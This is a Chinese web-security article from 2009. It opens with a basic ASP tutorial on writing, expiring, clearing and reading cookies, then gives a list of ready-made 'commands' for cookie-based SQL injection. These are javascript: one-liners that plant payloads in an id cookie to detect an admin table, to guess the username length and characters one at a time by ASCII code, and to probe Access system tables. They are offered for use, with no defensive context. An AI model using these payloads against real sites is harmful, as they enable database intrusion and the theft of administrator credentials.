首页 > 安全 > 网站安全 >

Cookies 注入详解与指令

2009-07-30

什么是Cookies?Cookies是数据包,可以让网页具有记忆功能,在某台电脑上记忆一定的信息。Cookies的工作原理是,第一次由服务器端写入到客户端的系统中。以后每次访问这个网页,都是先由客户端将Cookies发送到服务器端,再由服务器端进行

什么是Cookies?Cookies是数据包,可以让网页具有记忆功能,在某台电脑上记忆一定的信息。Cookies的工作原理是,第一次由服务器端写入到客户端的系统中。以后每次访问这个网页,都是先由客户端将Cookies发送到服务器端,再由服务器端进行判断,然后再产生HTML代码返回给客户端,这是一个很重要的原理。关于服务器端和客户端的概念,请点击我写的这篇:什么是服务器端和客户端,举了2个实例。
  
  Cookies在ASP中的最常用的方法,请做好笔记:
  
  1.如何写入Cookies?
  Response.Cookies("字段名")=变量或字符串,例如:
  Response.Cookies("name2")="Dingdang"
  
  2.如何设置Cookies时间?
  Response.Cookies("字段名").expires=时间函数+N,例如:
  Response.Cookies("name2").expires=date+1,表示Cookies保存1天,再比如:
  Response.Cookies("name2").expires=Hour+8,表示Cookies保存8小时。
  
  3.在以往的ASP教程中,很少有介绍Cookies退出的方法。在“退出”这个ASP页中可以这样写:
  Response.Cookies("字段名")=""
  之后,在客户端的浏览器就清除了Cookies,并且Cookies文件会消失。注意有多少个字段,就要写多少句来清除。
  
  4.如何读取Cookies?
  变量名=Request.Cookies("字段名"),例如:
  name2=Request.Cookies("name2")
  如果网页中写入<%=name2%>这句,则会显示“Dingdang”。
  也可以这样直接读取Cookies,<%=Request.Cookies("name2")%>
  
  Cookies是属于Session对象的一种。但有不同,Cookies不会占服务器资源;而“Session”则会占用服务器资源。所以,尽量不要使用Session,而使用Cookies。
  
  指令:
  
  javascript:alert(document.cookie="id="+escape("156 and 1=1"));
  javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
  //猜是否有admin表
  javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
  //猜是否有username表
  javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
  //看管理员密码是否是5位
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
  //第一位是否是ASC码97,相当于a
  javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
  javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
  //第二位
  javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
  //看系统表
相关文章
最新文章
热点推荐